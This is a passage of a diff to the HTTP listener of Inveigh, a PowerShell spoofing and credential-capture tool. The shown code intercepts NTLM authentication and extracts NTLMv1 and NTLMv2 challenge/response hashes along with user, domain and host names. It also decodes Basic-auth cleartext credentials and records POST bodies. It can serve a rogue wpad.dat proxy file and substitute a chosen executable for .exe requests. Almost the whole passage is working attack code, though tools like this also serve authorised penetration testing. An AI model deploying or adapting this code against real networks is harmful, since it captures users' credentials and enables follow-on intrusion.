System.Net.Security.SslStream($HTTP_clear_stream,$false) + $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN}) + $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false) + } - $HTTP_request_time = Get-Date -format 's' - $HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString + [byte[]]$SSL_request_bytes = $null - if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old) - { - $HTTP_raw_url_output = $false + do + { + $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)] + } while ($HTTP_clear_stream.DataAvailable) + + $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes) } else { - $HTTP_raw_url_output = $true - } - - if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output) - { - $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")]) + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() + $HTTP_stream = $HTTP_client.GetStream() + } + + while($HTTP_stream.DataAvailable) + { + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + } + + $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) } - $HTTP_request_raw_url_old = $inveigh.request.RawUrl - $HTTP_request_remote_endpoint_old = $HTTP_source_IP - $HTTP_request_time_old = $HTTP_request_time - - [String]$authentication_header = $inveigh.request.headers.GetValues('Authorization') - - if($authentication_header.StartsWith('NTLM ')) + if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*" -or $TCP_request -like "50-4f-53-54*") { - $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) - $inveigh.response.StatusCode = 401 + $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) + $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + + if($NBNSBruteForcePause) + { + $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $inveigh.hostname_spoof = $true + } - if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') - { - $inveigh.response.StatusCode = 401 - $NTLM = NTLMChallengeBase64 $Challenge - } - elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') - { - $NTLM = 'NTLM' - $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes - $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes - [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $inveigh.request.RemoteEndpoint.Port + '*' - $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) - $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) - - if($HTTP_NTLM_domain_length -eq 0) + if($TCP_request -like "*-48-6F-73-74-3A-20-*") + { + $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19) + $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) + $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) + } + + if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") + { + $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) + } + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + } + + } + + } + + if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") + { + $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) + $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-")) + $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length) + } + + if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true + } + else + { + + if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM')) { - $HTTP_NTLM_domain_string = '' + $HTTPNTLMESS = $true } else - { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes - } + { + $HTTPNTLMESS = $false + } + + if($proxy_listener) + { + $HTTP_response_status_code = 0x34,0x30,0x37 + $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 + } + else + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 + } + + $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 + $HTTP_client_close = $false + } + + if($TCP_request -like "50-4f-53-54*") + { + $HTTP_POST_request_extract = $TCP_request.Substring($TCP_request.IndexOf("-0D-0A-0D-0A-") + 12) + $HTTP_POST_request_extract = $HTTP_POST_request_extract.Substring(0,$HTTP_POST_request_extract.IndexOf("-00-")) + $HTTP_POST_request_extract = $HTTP_POST_request_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_POST_request = New-Object System.String ($HTTP_POST_request_extract,0,$HTTP_POST_request_extract.Length) + + if($HTTP_POST_request_old -ne $HTTP_POST_request) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP") + $inveigh.POST_request_file_queue.Add($HTTP_POST_request) + $inveigh.POST_request_list.Add($HTTP_POST_request) + + if($inveigh.file_output) + { + $inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file) + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP") + } + + } + + $HTTP_POST_request_old = $HTTP_POST_request + } + + if($HTTP_header_authorization.StartsWith('NTLM ')) + { + $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ','' + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization) + + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') + { + $NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port + } + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') + { + $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes + $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*' + $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) + $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) + + if($HTTP_NTLM_domain_length -eq 0) + { + $HTTP_NTLM_domain_string = "" + } + else + { + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes + } - $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes - $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes - $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes - if($HTTP_NTLM_length -eq 24) # NTLMv1 - { - $NTLM_type = "NTLMv1" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(48,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge + if($HTTP_NTLM_length -eq 24) # NTLMv1 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(48,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) - $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) + } + + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + } - else + + } + else # NTLMv2 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(32,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") - } + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) - { - $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) - } + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } - if($inveigh.NTLMv1_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + } + + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + } } - } - else # NTLMv2 - { - $NTLM_type = "NTLMv2" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(32,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($HTTP_source_IP) + } + + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true + $NTLM_challenge = "" + + if($proxy_listener) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if($HTTPResponse -or $HTTPDir) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) + $HTTP_header_cache_control = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x2c,0x20,0x6e,0x6f,0x2d,0x73,0x74,0x6f,0x72,0x65 } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") - } - - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) - { - $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + $HTTP_send = $false } - if($inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") - } - - } + } } - - if($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) + else { - $inveigh.IP_capture_list.Add($HTTP_source_IP) + $HTTP_client_close = $true } - - $inveigh.response.StatusCode = 200 - $NTLM_auth = $true - $NTLM_challenge = "" - $HTTP_raw_url_output = $true } - else + elseif($HTTP_header_authorization.startswith('Basic ')) { - $NTLM = 'NTLM' - } - - } - elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code - { - $inveigh.response.StatusCode = 200 - $basic_auth = $true - $authentication_header = $authentication_header -replace 'Basic ','' - $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) - $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ','' + $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization)) + $HTTP_client_close = $true + $inveigh.cleartext_file_queue.Add($cleartext_credentials) + $inveigh.cleartext_list.Add($cleartext_credentials) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP") + } - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) - } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP") + } - } - - if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth) - { - - if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))) - { - [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE)) } - elseif($HTTPDir) + + if(($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $WPADAuthIgnore.Count -gt 0 -and $WPADAuth -like 'NTLM*' -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})) -or $HTTP_client_close) { - if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') + if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url))) { - [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE)) + $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/exe") } - elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile))) + elseif($HTTPDir) { - [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) - } - elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat') - { - [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse) + + if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $HTTP_request_raw_url -notmatch '/wpad.dat') + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) + } + elseif(($HTTPDefaultFile -and $HTTP_request_raw_url -eq '' -or $HTTPDefaultFile -and $HTTP_request_raw_url -eq '/') -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile))) + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) + } + elseif($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat') + { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse) + $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + } + else + { + + if(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTP_request_raw_url)) + } + else + { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse) + } + + } + } else { - - if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) + + if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) { - [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir 